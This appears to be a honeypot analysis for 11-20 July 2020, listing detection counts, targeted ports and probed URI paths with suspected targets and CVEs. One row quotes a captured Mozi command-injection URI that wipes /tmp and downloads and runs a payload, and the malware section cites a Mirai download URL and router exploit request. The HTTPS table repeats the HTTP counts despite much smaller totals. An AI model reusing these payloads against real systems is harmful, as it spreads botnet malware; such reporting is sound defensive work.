This is a brief analysis of honeypot data for 2020/7/11-7/20.
Honeytrap(Total)
Number of detections
| Date | Detections |
|---|---|
| 20200711 | 10199 |
| 20200712 | 10806 |
| 20200713 | 142645 |
| 20200714 | 20625 |
| 20200715 | 17479 |
| 20200716 | 17890 |
| 20200717 | 30806 |
| 20200718 | 10413 |
| 20200719 | 35053 |
| 20200720 | 17726 |
Port(TOP20)
| Port | Service | Count |
|---|---|---|
| 22 | The Secure Shell (SSH) Protocol | 17335 |
| 445 | Microsoft-DS | 16998 |
| 1433 | Microsoft-SQL-Server | 12738 |
| 3389 | MS WBT Server | 4343 |
| 8088 | Radan HTTP | 1362 |
| 81 | Unknown | 1032 |
| 502 | Modbus Application Protocol | 790 |
| 8080 | HTTP Alternate (see port 80) | 376 |
| 5432 | PostgreSQL Database | 376 |
| 88 | Kerberos | 261 |
| 5555 | Android Debug Bridge | 239 |
| 8081 | Sun Proxy Admin Service | 212 |
| 139 | NETBIOS Session Service | 181 |
| 8443 | PCsync HTTPS | 180 |
| 21 | File Transfer Protocol [Control] | 167 |
| 85 | MIT ML Device | 162 |
| 37215 | Unknown | 158 |
| 6379 | An advanced key-value cache and store | 155 |
| 8089 | Unknown | 144 |
| 9200 | WAP connectionless session service | 139 |
URI PATH
/streaming/clients_live[.]php
I have not been able to identify the type of vulnerability, but traffic to /streaming/clients_live[.]php was observed on multiple ports.
| URI Path | Target | CVE | Count |
|---|---|---|---|
| No uri path | - | - | 302276 |
| / | - | - | 7255 |
| /ws/v1/cluster/apps/new-application | Apache Hadoop | - | 1263 |
| login[.]cgi | D-Link Router | - | 248 |
| /streaming/clients_live[.]php | - | - | 170 |
| /ftptest[.]cgi | Web Camera | - | 162 |
| /set_ftp[.]cgi | - | - | 159 |
| hxxp://163[.]172[.]88[.]110:41298/pass | Unauthorized relay | - | 144 |
| /ctrlt/DeviceUpgrade_1 | Huawei Home Device | - | 141 |
| sip:nm | Session Initiation Protocol | - | 103 |
| /nice | - | - | 99 |
| /stalker_portal/c/ | - | - | 86 |
| /stalker_portal/c/version[.]js | - | - | 85 |
| /client_area/ | Unknown | Unknown | 85 |
| /system_api[.]php | - | - | 85 |
| /api[.]php | api | - | 85 |
| /login[.]php | Login Page | - | 85 |
| /streaming | - | - | 85 |
| /streaming/er678pkf[.]php | - | - | 85 |
| /picsdesc[.]xml | Realtek SDK | CVE-2014-8361 | 61 |
| hxxp://clientapi[.]ipip[.]net/echo[.]php | Unauthorized relay | - | 57 |
| /admin/assets/js/views/login[.]js | FreePBX | - | 56 |
| /manager/html | Apache Tomcat Manager | - | 45 |
| /version | - | - | 44 |
| /shell | - | - | 42 |
| hxxp://example[.]com/ | Unauthorized relay | - | 36 |
| /service/extdirect | - | - | 32 |
| hxxp://112[.]35[.]66[.]7:8088/index[.]php | - | - | 32 |
| /jars | Unknown | - | 31 |
| /jmx | JMX | - | 29 |
| /ipp | CUPS | CVE-2015-1158 | 26 |
| /_ping | Unknown | - | 24 |
| hxxp://112[.]35[.]63[.]31:8088/index[.]php | - | - | 22 |
| /v1[.]16/version | - | - | 21 |
| hxxp://112[.]124[.]42[.]80:63435/ | Unauthorized relay | - | 20 |
| /setup/index[.]jsp | - | - | 17 |
| /solr/admin/info/system | - | - | 14 |
| hxxp://112[.]35[.]88[.]28:8088/index[.]php | - | - | 14 |
| /api/v1/targets | api | - | 12 |
| /api/v1/label/version/values | api | - | 12 |
| hxxp://pv[.]sohu[.]com/cityjson | Unauthorized relay | - | 12 |
| hxxp://112[.]35[.]53[.]83:8088/index[.]php | - | - | 12 |
| /_search | Elasticsearch | - | 11 |
| /\cgi-bin/get_status[.]cgi | Apexis IP CAM | - | 11 |
| /config/getuser | - | - | 10 |
| /\cgi-bin/login[.]cgi | Crestron AirMedia AM-100 | CVE-2016-5639 | 10 |
| hxxp://123[.]125[.]114[.]144/ | Unauthorized relay | - | 10 |
| /containers/json | Docker | - | 10 |
| /hudson | Unknown | - | 9 |
| /tmUnblock[.]cgi | - | - | 9 |
| /info | - | - | 9 |
| /stats | - | - | 9 |
| /db/manage/ | Database | - | 9 |
| /api/v1/label/goversion/values | api | - | 8 |
| /api/v1/query | api | - | 8 |
| /wls-wsat/CoordinatorPortType11 | Weblogic | CVE-2017-10271 | 7 |
| /v1[.]40/containers/json | Docker | - | 7 |
| /lib/flagrate/flagrate[.]min[.]css | Flagrate | - | 6 |
| /images/json | Docker | - | 6 |
| /setup/eureka_info | - | - | 6 |
| rtsp://160[.]16[.]145[.]183:554/12 | RTSP | - | 5 |
| /admin-scripts[.]asp | Administrator | - | 5 |
| /phpMyAdmin-3[.]0[.]0[.]0-all-languages/scripts/setup[.]php | phpMyAdmin | - | 5 |
| /tmpfs/auto[.]jpg | - | - | 4 |
| /UD/ | Eir D1000 Wireless Router | - | 4 |
| /manager/text/list | Apache Tomcat Manager | - | 4 |
| /wsman | WinRM | - | 4 |
| /status | - | - | 3 |
| /cgi-bin/supervisor/CloudSetup[.]cgi | CGI | - | 3 |
| /Telerik[.]Web[.]UI[.]WebResource[.]axd | - | - | 3 |
| /_config | Unknown | Unknown | 3 |
| hxxps://hxxpbin[.]org/ip | Unauthorized Relay | - | 3 |
| RTSP://160[.]16[.]145[.]183:554/ | RTSP | - | 2 |
| RTSP://160[.]16[.]145[.]183:8554/ | RTSP | - | 2 |
| /json_rpc | JSON-RPC | - | 2 |
| /admin/login[.]asp | Administrator | - | 2 |
| rtsp:// | RTSP | - | 2 |
| /upnpdev[.]xml | Huawei Home Gateway(HG655m) | - | 2 |
| /tr064dev[.]xml | - | - | 2 |
| /solr/ | - | - | 2 |
| /TP/public/index[.]php | - | - | 2 |
| /UD/act | Eir D1000 Wireless Router | - | 2 |
| /_cat/indices | Elasticsearch | - | 2 |
| /cgi-bin/bfenterprise/clientregister[.]exe | CGI | - | 2 |
| /ws/v1/cluster | Apache Hadoop | - | 2 |
| /cgi-bin/nobody/Search[.]cgi | CGI | - | 2 |
| /master-status | Unknown | - | 2 |
| /boaform/admin/formLogin | Administrator | - | 2 |
| /install[.]php | php | - | 2 |
| /upnp/control/WANIPConn1 | UPnP | - | 2 |
| /0bef | Unknown | - | 1 |
| hxxp://160[.]16[.]145[.]183:49152/upnp/control/basicevent1 | Unauthorized relay | - | 1 |
| /admin/connection/ | Administrator | - | 1 |
| /server-info | - | - | 1 |
| /HNAP1/ | D-Link Router | CVE-2017-3193 | 1 |
| /wls-wsat/CoordinatorPortType | Weblogic | CVE-2017-10271 | 1 |
| /cgi | CGI | - | 1 |
| /fikker/webcache[.]fik | Fikker | - | 1 |
| /_nodes | Unknown | Unknown | 1 |
| rtsp://160[.]16[.]145[.]183:21553/12 | RTSP | - | 1 |
| rtsp://160[.]16[.]145[.]183:44554/12 | RTSP | - | 1 |
| /check | Unknown | Unknown | 1 |
| hxxp://www[.]overflow[.]biz/ip_json[.]php | Unauthorized relay | - | 1 |
| /wp-login[.]php | WordPress | - | 1 |
| RTSP://160[.]16[.]145[.]183:10554/ | RTSP | - | 1 |
| /nwa | Unknown | Unknown | 1 |
| /script | - | - | 1 |
| /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}hxxp://192[.]168[.]1[.]1:8088/Mozi[.]a;sh${IFS}/tmp/Mozi[.]a&>r&&tar${IFS}/string[.]js | Multiple CCTV-DVR Vendors | - | 1 |
| /versions | - | - | 1 |
| /favicon[.]ico | favicon | - | 1 |
| /cluser | Unknown | Unknown | 1 |
| /api/v1 | api | - | 1 |
| /setup[.]xml | - | - | 1 |
| /v2/stats/self | - | - | 1 |
| /A6nw | Unknown | Unknown | 1 |
| /live/CPEManager/AXCampaignManager/delete_cpes_by_ids | Zyxel CNM SecuManager | - | 1 |
| /setup[.]cgi | - | - | 1 |
| /jsproxy | MikroTik RouterOS | - | 1 |
| hxxps://api[.]ipify[.]org/ | Unauthorized Relay | - | 1 |
| /login | Login Page | - | 1 |
| /CTCWebService/CTCWebServiceBean | SAP | CVE-2020-6286 CVE-2020-6287 | 1 |
| /invoker/EJBInvokerServlet | HP Product | CVE-2013-4810 | 1 |
| /api | api | - | 1 |
Malware
hxxp://37[.]49[.]230[.]201/ScyllaBinsLMaOGuESsWhatYerNotGettIn3m/Scylla[.]mips
This traffic was an attack targeting a vulnerability in the Eir D1000 router that attempted to download Mirai.
The User-Agent is distinctive, so this may be a specific Mirai variant.
<Payload>
POST /UD/act?1 HTTP/1.1
User-Agent: Masayki
WOWHoneypot(Total)
Number of detections
| Date | Detections |
|---|---|
| 20200711 | 55 |
| 20200712 | 251 |
| 20200713 | 411 |
| 20200714 | 741 |
| 20200715 | 135 |
| 20200716 | 86 |
| 20200717 | 365 |
| 20200718 | 2062 |
| 20200719 | 70 |
| 20200720 | 106 |
URI PATH
| URI Path | Target | CVE | Count |
|---|---|---|---|
| /manager/html | Apache Tomcat Manager | - | 2516 |
| /wp-login[.]php | WordPress | - | 588 |
| / | - | - | 420 |
| /xmlrpc[.]php | WordPress | - | 294 |
| github[.]com:443 | Unauthorized Relay | - | 30 |
| /phpMyAdmin/scripts/setup[.]php | phpMyAdmin | - | 24 |
| hxxpbin[.]org:443 | Unauthorized Relay | - | 14 |
| /solr/admin/info/system | - | - | 11 |
| /index[.]php | - | - | 11 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php | PHPUnit | CVE-2017-9841 | 10 |
| /hudson | Unknown | - | 9 |
| /api/jsonws/invoke | api | - | 9 |
| /cgi-bin/mainfunction[.]cgi | CGI | - | 8 |
| /[.]env | Hidden files | - | 8 |
| /portal/redlion | Unknown | Unknown | 8 |
| /config/getuser | - | - | 8 |
| sm[.]bdimg[.]com:443 | Unauthorized Relay | - | 7 |
| /boaform/admin/formLogin | Administrator | - | 6 |
| g[.]alicdn[.]com:443 | Unauthorized Relay | - | 6 |
| /favicon[.]ico | favicon | - | 5 |
| /admin/login[.]asp | Administrator | - | 3 |
| /webfig/ | MikroTik RouterOS | - | 3 |
| /phpmyadmin/ | phpMyAdmin | - | 3 |
| /myadmin/scripts/setup[.]php | Administrator | - | 3 |
| /phpmy/scripts/setup[.]php | phpMyAdmin | - | 3 |
| /pma/scripts/setup[.]php | phpMyAdmin | - | 3 |
| /shell | - | - | 3 |
| /robots[.]txt | robots.txt | - | 3 |
| /cgi-bin/kerbynet | CGI | - | 3 |
| /ipc$ | shared folder | - | 2 |
| /database/scripts/setup[.]php | Database | - | 2 |
| /db/scripts/setup[.]php | Database | - | 2 |
| /dbadmin/scripts/setup[.]php | Administrator | - | 2 |
| /my/scripts/setup[.]php | phpMyAdmin | - | 2 |
| /mysql/scripts/setup[.]php | MySQL | - | 2 |
| /mysqladmin/scripts/setup[.]php | MySQL | - | 2 |
| /phpMyAdmin-2/scripts/setup[.]php | phpMyAdmin | - | 2 |
| /phpadmin/scripts/setup[.]php | Administrator | - | 2 |
| /phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 2 |
| /phpmyadmin1/scripts/setup[.]php | phpMyAdmin | - | 2 |
| /phpmyadmin2/scripts/setup[.]php | phpMyAdmin | - | 2 |
| /scripts/setup[.]php | - | - | 2 |
| /sqladm/scripts/setup[.]php | - | - | 2 |
| /sqladmin/scripts/setup[.]php | - | - | 2 |
| /MyAdmin/scripts/setup[.]php | Administrator | - | 2 |
| hxxp://example[.]com/ | Unauthorized relay | - | 2 |
| /streaming/clients_live[.]php | - | - | 2 |
| /sdk | - | - | 2 |
| /[.]remote | Hidden files | - | 2 |
| /[.]local | Hidden files | - | 2 |
| /[.]production | Hidden files | - | 2 |
| //vendor/[.]env | - | - | 2 |
| //lib/[.]env | - | - | 2 |
| //lab/[.]env | - | - | 2 |
| //cronlab/[.]env | - | - | 2 |
| //cron/[.]env | - | - | 2 |
| //core/[.]env | - | - | 2 |
| //core/app/[.]env | - | - | 2 |
| //core/Datavase/[.]env | - | - | 2 |
| //database/[.]env | - | - | 2 |
| //config/[.]env | - | - | 2 |
| //assets/[.]env | - | - | 2 |
| //app/[.]env | - | - | 2 |
| //apps/[.]env | - | - | 2 |
| //uploads/[.]env | - | - | 2 |
| //sitemaps/[.]env | - | - | 2 |
| //saas/[.]env | - | - | 2 |
| /wp-content/plugins/t_file_wp/t_file_wp[.]php | WordPress | - | 2 |
| /wordpress/wp-login[.]php | WordPress | - | 2 |
| 5[.]132[.]162[.]27:443 | Unauthorized Relay | - | 2 |
| hxxp://163[.]172[.]88[.]110:41298/pass | Unauthorized relay | - | 2 |
| /sitemap[.]xml | - | - | 2 |
| /[.]well-known/security[.]txt | Hidden files | - | 2 |
| /boaform/admin/formPing | Administrator | - | 1 |
| ext[.]baidu[.]com:443 | Unauthorized Relay | - | 1 |
| hxxp://112[.]124[.]42[.]80:63435/ | Unauthorized relay | - | 1 |
| /w00tw00t[.]at[.]blackhats[.]romanian[.]anti-sec:) | ZmEu | - | 1 |
| /2phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /PMA/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /PMA2011/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /PMA2012/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /PMA2013/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /PMA2015/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /PMA2016/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /PMA2018/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /SQL/scripts/setup[.]php | - | - | 1 |
| /_PHPMYADMIN/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /admin/db/scripts/setup[.]php | Administrator | - | 1 |
| /admin/mysql/scripts/setup[.]php | MySQL | - | 1 |
| /admin/pMA/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /admin/phpMyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /admin/scripts/setup[.]php | Administrator | - | 1 |
| /admin/setup[.]php | Administrator | - | 1 |
| /admin/sql/scripts/setup[.]php | SQL | - | 1 |
| /admin/sqladmin/scripts/setup[.]php | SQLAdmin | - | 1 |
| /admin/sysadmin/scripts/setup[.]php | Administrator | - | 1 |
| /admin/web/scripts/setup[.]php | Administrator | - | 1 |
| /administrator1/admin/scripts/setup[.]php | Administrator | - | 1 |
| /administrator1/db/scripts/setup[.]php | Administrator | - | 1 |
| /administrator1/pma/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /administrator1/web/scripts/setup[.]php | Administrator | - | 1 |
| /administrator/admin/scripts/setup[.]php | Administrator | - | 1 |
| /administrator/db/scripts/setup[.]php | Administrator | - | 1 |
| /administrator/pma/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /administrator/web/scripts/setup[.]php | Administrator | - | 1 |
| /blog/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /cpadmin/scripts/setup[.]php | Administrator | - | 1 |
| /cpadmindb/scripts/setup[.]php | Administrator | - | 1 |
| /cpanelmysql/scripts/setup[.]php | MySQL | - | 1 |
| /cpanelphpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /db/db-admin/scripts/setup[.]php | Administrator | - | 1 |
| /db/dbadmin/scripts/setup[.]php | Administrator | - | 1 |
| /db/dbweb/scripts/setup[.]php | Database | - | 1 |
| /db/myadmin/scripts/setup[.]php | Administrator | - | 1 |
| /db/phpMyAdmin-3/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /db/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /db/phpmyadmin3/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /db/webadmin/scripts/setup[.]php | Administrator | - | 1 |
| /db/webdb/scripts/setup[.]php | Database | - | 1 |
| /db/websql/scripts/setup[.]php | SQL | - | 1 |
| /mysql-admin/scripts/setup[.]php | MySQL | - | 1 |
| /mysql/admin/scripts/setup[.]php | MySQL | - | 1 |
| /mysql/db/scripts/setup[.]php | MySQL | - | 1 |
| /mysql/mysqlmanager/scripts/setup[.]php | MySQL | - | 1 |
| /mysql/pMA/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /mysql/sqlmanager/scripts/setup[.]php | MySQL | - | 1 |
| /mysql/web/scripts/setup[.]php | MySQL | - | 1 |
| /mysqlmanager/scripts/setup[.]php | MySQL | - | 1 |
| /p/m/a/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /php-my-admin/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /php-myadmin/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /php/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpLDAPadmin/scripts/setup[.]php | Administrator | - | 1 |
| /phpMyAdmi/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /hpMyAdmin/scripts/setup[.]php | Administrator | - | 1 |
| /phpMyAdmin-2009-1/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-2009-3/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-2009-2/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-3[.]1[.]3[.]1/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-2[.]11[.]9[.]5/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-2[.]10[.]0[.]0/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-2[.]10[.]0/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-2[.]11[.]1-all-languages/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-2[.]11[.]11[.]3/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-2[.]11[.]11/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-2[.]5[.]5/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-3[.]0[.]0[.]0-all-languages/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin-3/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpMyAds/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmanager/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmy-admin/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin2011/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin2012/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin2013/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin2014/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin2015/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin2017/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin2018/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin3/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin4/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin5/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin6/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin7/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phppgadmin/scripts/setup[.]php | Administrator | - | 1 |
| /phppma/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2006/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2007/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2008/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2009/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2010/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2011/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2012/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2013/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2014/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2015/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2016/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pma2017/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /program/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /shopdb/scripts/setup[.]php | - | - | 1 |
| /sql/myadmin/scripts/setup[.]php | - | - | 1 |
| /sql/php-myadmin/scripts/setup[.]php | - | - | 1 |
| /sql/phpMyAdmin/scripts/setup[.]php | - | - | 1 |
| /sql/phpMyAdmin2/scripts/setup[.]php | - | - | 1 |
| /sql/phpmanager/scripts/setup[.]php | - | - | 1 |
| /sql/phpmy-admin/scripts/setup[.]php | - | - | 1 |
| /sql/sql-admin/scripts/setup[.]php | - | - | 1 |
| /sql/sql/scripts/setup[.]php | - | - | 1 |
| /sql/sqladmin/scripts/setup[.]php | - | - | 1 |
| /sql/sqlweb/scripts/setup[.]php | - | - | 1 |
| /sql/webadmin/scripts/setup[.]php | - | - | 1 |
| /sql/webdb/scripts/setup[.]php | - | - | 1 |
| /sql/websql/scripts/setup[.]php | - | - | 1 |
| /sqlmanager/scripts/setup[.]php | - | - | 1 |
| /sqlweb/scripts/setup[.]php | - | - | 1 |
| /web/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /web/scripts/setup[.]php | web page | - | 1 |
| /webadmin/scripts/setup[.]php | Administrator | - | 1 |
| /webdb/scripts/setup[.]php | Database | - | 1 |
| /websql/scripts/setup[.]php | SQL | - | 1 |
| /xampp/phpmyadmin/scripts/setup[.]php | Unknown | - | 1 |
| /~/phpmanager/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /PHPMYADMIN/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /pHpMyAdMiN/scripts/setup[.]php | phpMyAdmin | - | 1 |
| /phpmyadmin/scripts/db[.]init[.]php | phpMyAdmin | - | 1 |
| /phpMyAdmin/scripts/db[.]init[.]php | phpMyAdmin | - | 1 |
| /phpAdmin/scripts/setup[.]php | Administrator | - | 1 |
| /tmpfs/auto[.]jpg | - | - | 1 |
| /wp-content/plugins/angwp/package[.]json | WordPress | - | 1 |
| /manager/text/list | Apache Tomcat Manager | - | 1 |
| /stalker_portal/c/version[.]js | - | - | 1 |
| /client_area/ | Unknown | Unknown | 1 |
| /system_api[.]php | - | - | 1 |
| /stalker_portal/c/ | - | - | 1 |
| /api[.]php | api | - | 1 |
| /login[.]php | Login Page | - | 1 |
| /streaming | - | - | 1 |
| /streaming/er678pkf[.]php | - | - | 1 |
| /cdn-cgi/trace | Cloudflare | - | 1 |
| /// | - | - | 1 |
| ///wp-json/wp/v2/users/ | - | - | 1 |
| /HNAP1/ | D-Link Router | CVE-2017-3193 | 1 |
| hxxp://112[.]35[.]88[.]28:8088/index[.]php | - | - | 1 |
| /nmaplowercheck1594687755 | Nmap | - | 1 |
| /NmapUpperCheck1594687755 | Nmap | - | 1 |
| /Nmap/folder/check1594687755 | Nmap | - | 1 |
| /HNAP1 | D-Link Router | CVE-2017-3193 | 1 |
| /evox/about | Nmap | - | 1 |
| /ctrlt/DeviceUpgrade_1 | Huawei Home Device | - | 1 |
| /Telerik[.]Web[.]UI[.]WebResource[.]axd | - | - | 1 |
| /TP/public/index[.]php | - | - | 1 |
| /nmaplowercheck1594884888 | Nmap | - | 1 |
| /NmapUpperCheck1594884888 | Nmap | - | 1 |
| /solr/ | - | - | 1 |
| /ReportServer | SQL Server Reporting Services | CVE-2020-0618 | 1 |
| /adv,/cgi-bin/weblogin[.]cgi | Zyxel NAS | CVE-2020-9054 | 1 |
| '/xui/common/images/bg_status[.]php' | F5 Networks BIG-IP | CVE-2020-5902 | 1 |
| /nice ports,/Trinity[.]txt[.]bak | - | - | 1 |
| md5calc[.]com:443 | Unauthorized Relay | - | 1 |
| ifconfig[.]me:443 | Unauthorized Relay | - | 1 |
| www[.]showmyip[.]com:443 | Unauthorized Relay | - | 1 |
| /wordpress | WordPress | - | 1 |
| /wordpress/wp-json/wp/v2/users | WordPress | - | 1 |
| /wordpress/ | WordPress | - | 1 |
| /user/UserLogin | WP Marketplace 2.4.0 | CVE-2014-9013 CVE-2014-9014 | 1 |
| chekfast[.]zennolab[.]com:443 | Unauthorized Relay | - | 1 |
| hxxps://chek[.]zennolab[.]com/proxy[.]php | Unauthorized Relay | - | 1 |
| v4[.]ipv6-test[.]com:443 | Unauthorized Relay | - | 1 |
| hxxp://112[.]35[.]63[.]31:8088/index[.]php | - | - | 1 |
WOWHoneypot(HTTPS)(Total)
Number of detections
| Date | Detections |
|---|---|
| 20200711 | 21 |
| 20200712 | 7 |
| 20200713 | 18 |
| 20200714 | 8 |
| 20200715 | 15 |
| 20200716 | 17 |
| 20200717 | 21 |
| 20200718 | 19 |
| 20200719 | 25 |
| 20200720 | 17 |
URI PATH
| URI Path | Target | CVE | Count |
|---|---|---|---|
| /manager/html | Apache Tomcat Manager | - | 2516 件 |
| /wp-login[.]php | WordPress | - | 588 件 |
| / | - | - | 420 件 |
| /xmlrpc[.]php | WordPress | - | 294 件 |
| github[.]com:443 | Unauthorized Relay | - | 30 件 |
| /phpMyAdmin/scripts/setup[.]php | phpMyAdmin | - | 24 件 |
| hxxpbin[.]org:443 | Unauthorized Relay | - | 14 件 |
| /solr/admin/info/system | - | - | 11 件 |
| /index[.]php | - | - | 11 件 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php | PHPUnit | CVE-2017-9841 | 10 件 |
| /hudson | Unknown | - | 9 件 |
| /api/jsonws/invoke | api | - | 9 件 |
| /cgi-bin/mainfunction[.]cgi | CGI | - | 8 件 |
| /[.]env | Hidden files | - | 8 件 |
| /portal/redlion | Unknown | Unknown | 8 件 |
| /config/getuser | - | - | 8 件 |
| sm[.]bdimg[.]com:443 | Unauthorized Relay | - | 7 件 |
| /boaform/admin/formLogin | Administrator | - | 6 件 |
| g[.]alicdn[.]com:443 | Unauthorized Relay | - | 6 件 |
| /favicon[.]ico | favicon | - | 5 件 |
| /admin/login[.]asp | Administrator | - | 3 件 |
| /webfig/ | MikroTik RouterOS | - | 3 件 |
| /phpmyadmin/ | phpMyAdmin | - | 3 件 |
| /myadmin/scripts/setup[.]php | Administrator | - | 3 件 |
| /phpmy/scripts/setup[.]php | phpMyAdmin | - | 3 件 |
| /pma/scripts/setup[.]php | phpMyAdmin | - | 3 件 |
| /shell | - | - | 3 件 |
| /robots[.]txt | robots.txt | - | 3 件 |
| /cgi-bin/kerbynet | CGI | - | 3 件 |
| /ipc$ | shared folder | - | 2 件 |
| /database/scripts/setup[.]php | Database | - | 2 件 |
| /db/scripts/setup[.]php | Database | - | 2 件 |
| /dbadmin/scripts/setup[.]php | Administrator | - | 2 件 |
| /my/scripts/setup[.]php | PHPMyAdmin | - | 2 件 |
| /mysql/scripts/setup[.]php | MySQL | - | 2 件 |
| /mysqladmin/scripts/setup[.]php | MySQL | - | 2 件 |
| /phpMyAdmin-2/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /phpadmin/scripts/setup[.]php | Administrator | - | 2 件 |
| /phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /phpmyadmin1/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /phpmyadmin2/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /scripts/setup[.]php | - | - | 2 件 |
| /sqladm/scripts/setup[.]php | - | - | 2 件 |
| /sqladmin/scripts/setup[.]php | - | - | 2 件 |
| /MyAdmin/scripts/setup[.]php | Administrator | - | 2 件 |
| hxxp://example[.]com/ | Unauthorized relay | - | 2 件 |
| /streaming/clients_live[.]php | - | - | 2 件 |
| /sdk | - | - | 2 件 |
| /[.]remote | Hidden files | - | 2 件 |
| /[.]local | Hidden files | - | 2 件 |
| /[.]production | Hidden files | - | 2 件 |
| //vendor/[.]env | - | - | 2 件 |
| //lib/[.]env | - | - | 2 件 |
| //lab/[.]env | - | - | 2 件 |
| //cronlab/[.]env | - | - | 2 件 |
| //cron/[.]env | - | - | 2 件 |
| //core/[.]env | - | - | 2 件 |
| //core/app/[.]env | - | - | 2 件 |
| //core/Datavase/[.]env | - | - | 2 件 |
| //database/[.]env | - | - | 2 件 |
| //config/[.]env | - | - | 2 件 |
| //assets/[.]env | - | - | 2 件 |
| //app/[.]env | - | - | 2 件 |
| //apps/[.]env | - | - | 2 件 |
| //uploads/[.]env | - | - | 2 件 |
| //sitemaps/[.]env | - | - | 2 件 |
| //saas/[.]env | - | - | 2 件 |
| /wp-content/plugins/t_file_wp/t_file_wp[.]php | WordPress | - | 2 件 |
| /wordpress/wp-login[.]php | WordPress | - | 2 件 |
| 5[.]132[.]162[.]27:443 | Unauthorized Relay | - | 2 件 |
| hxxp://163[.]172[.]88[.]110:41298/pass | Unauthorized relay | - | 2 件 |
| /sitemap[.]xml | - | - | 2 件 |
| /[.]well-known/security[.]txt | Hidden files | - | 2 件 |
| /boaform/admin/formPing | Administrator | - | 1 件 |
| ext[.]baidu[.]com:443 | Unauthorized Relay | - | 1 件 |
| hxxp://112[.]124[.]42[.]80:63435/ | Unauthorized relay | - | 1 件 |
| /w00tw00t[.]at[.]blackhats[.]romanian[.]anti-sec:) | ZmEu | - | 1 件 |
| /2phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2011/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2012/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2013/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2015/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2016/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
